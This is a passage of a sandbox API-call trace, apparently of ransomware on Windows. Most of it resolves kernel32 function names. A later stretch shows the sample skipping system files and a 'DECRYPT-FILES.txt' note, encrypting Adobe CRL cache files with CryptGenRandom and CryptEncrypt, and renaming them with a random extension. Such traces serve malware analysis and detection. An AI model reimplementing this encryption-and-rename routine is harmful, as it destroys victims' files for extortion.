lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0076.857] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0076.857] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0076.857] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0076.857] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0076.857] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0076.857] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0076.857] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0076.857] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0076.857] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0076.857] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0076.857] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0076.857] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0076.857] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0076.857] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0076.857] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0076.857] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0076.857] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0076.857] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0076.857] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0076.858] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0076.858] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0076.858] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0076.858] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0076.858] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0076.858] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0076.858] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0076.858] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0076.858] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0076.858] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0076.858] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0076.858] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0076.858] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0076.858] lstrlenA (lpString="CREATETHREAD") returned 12 [0076.858] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0076.858] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0076.859] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0076.859] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0076.859] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0076.859] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0076.859] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0076.859] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0076.859] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0076.859] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0076.859] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0076.859] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0076.859] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0076.859] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0076.859] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0076.859] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0076.859] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0076.859] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0076.859] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0076.859] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0076.859] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0076.859] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0076.859] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0076.859] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0076.859] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0076.859] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0076.859] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0076.859] lstrlenA (lpString="CTRLROUTINE") returned 11 [0076.859] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0076.859] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0076.859] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0076.859] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0076.859] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0076.859] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0076.859] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0076.859] lstrlenA (lpString="DEBUGBREAK") returned 10 [0076.859] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0076.859] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0076.859] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0076.859] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0076.860] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0076.860] lstrlenA (lpString="DECODEPOINTER") returned 13 [0076.860] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0076.860] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0076.860] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0076.860] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0076.860] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0076.860] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0076.860] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0076.860] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0076.860] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0076.860] lstrlenA (lpString="DELETEATOM") returned 10 [0076.860] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0076.860] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0076.860] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0076.860] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0076.860] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0076.860] lstrlenA (lpString="DELETEFIBER") returned 11 [0076.860] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0076.860] lstrlenA (lpString="DELETEFILEA") returned 11 [0076.860] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0076.860] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0076.860] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0076.860] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0076.860] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0076.860] lstrlenA (lpString="DELETEFILEW") returned 11 [0076.860] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0076.860] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0076.860] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0076.860] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0076.860] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0076.860] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0076.860] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0076.860] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0076.860] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0076.860] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0076.861] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0076.861] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0076.861] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0076.861] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0076.861] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0076.861] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0076.861] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0076.861] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0076.861] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0076.861] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0076.861] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0076.861] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0076.861] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0076.861] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0076.861] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0076.861] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0076.861] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0076.861] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0076.861] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0076.861] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0076.861] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0076.861] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0076.861] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0076.861] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0076.861] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0076.861] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0076.861] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0076.861] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0076.861] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0076.861] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0076.861] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0076.861] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0076.861] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0076.861] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0076.861] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0076.861] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0076.861] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0076.862] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0076.862] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0076.862] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0076.862] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0076.862] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0076.862] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0076.862] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0076.862] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0076.862] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0076.862] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0076.862] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0076.862] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0076.862] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0076.862] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0076.862] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0076.862] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0076.862] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0076.862] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0076.862] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0076.862] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0076.862] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0076.862] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl") returned 127 [0076.862] wsprintfW (in: param_1=0x3f2d238, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.IZjmQ") returned 133 [0076.862] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.IZjmQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl.izjmq"), dwFlags=0x0) returned 1 [0076.863] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.863] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.863] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.864] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xda3e4ea0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xda3e4ea0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xdefa3660, ftLastWriteTime.dwHighDateTime=0x1d2e625, nFileSizeHigh=0x0, nFileSizeLow=0x9347, dwReserved0=0x0, dwReserved1=0x0, cFileName="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", cAlternateFileName="A9B821~1.CRL")) returned 1 [0076.864] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpString2="DECRYPT-FILES.txt") returned -1 [0076.864] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpString2="autorun.inf") returned -1 [0076.864] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpString2="boot.ini") returned -1 [0076.864] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpString2="desktop.ini") returned -1 [0076.864] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpString2="ntuser.dat") returned -1 [0076.864] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpString2="iconcache.db") returned -1 [0076.864] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpString2="bootsect.bak") returned -1 [0076.864] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpString2="ntuser.dat.log") returned -1 [0076.864] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpString2="thumbs.db") returned -1 [0076.864] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpString2="Bootfont.bin") returned -1 [0076.864] lstrlenW (lpString="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl") returned 44 [0076.864] lstrcmpiW (lpString1="crl", lpString2="lnk") returned -1 [0076.864] lstrcmpiW (lpString1="crl", lpString2="exe") returned -1 [0076.864] lstrcmpiW (lpString1="crl", lpString2="sys") returned -1 [0076.864] lstrcmpiW (lpString1="crl", lpString2="dll") returned -1 [0076.864] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\") returned 83 [0076.864] lstrlenW (lpString="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl") returned 44 [0076.864] lstrcpyW (in: lpString1=0x3f2da38, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\" [0076.864] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpString2="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl" [0076.864] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.864] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\a9b8213768adc68af64fcc6409e8be414726687f.crl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x468 [0076.865] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x3f2d200 | out: lpFileSize=0x3f2d200*=37703) returned 1 [0076.865] CreateFileMappingW (hFile=0x468, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x46c [0076.865] MapViewOfFile (hFileMappingObject=0x46c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0076.866] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0076.866] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0076.866] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0076.868] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d168*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d168*=0x100) returned 1 [0076.868] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0076.869] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.869] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0076.870] CloseHandle (hObject=0x46c) returned 1 [0076.870] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.870] WriteFile (in: hFile=0x468, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d188, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d188*=0x108, lpOverlapped=0x0) returned 1 [0076.871] CloseHandle (hObject=0x0) returned 0 [0076.871] CloseHandle (hObject=0x468) returned 1 [0076.872] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.872] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.872] GetTickCount () returned 0x114bba2 [0076.872] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.873] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0076.873] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0076.873] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0076.873] lstrlenA (lpString="kernel32.dll") returned 12 [0076.874] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0076.874] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0076.874] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0076.874] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0076.874] 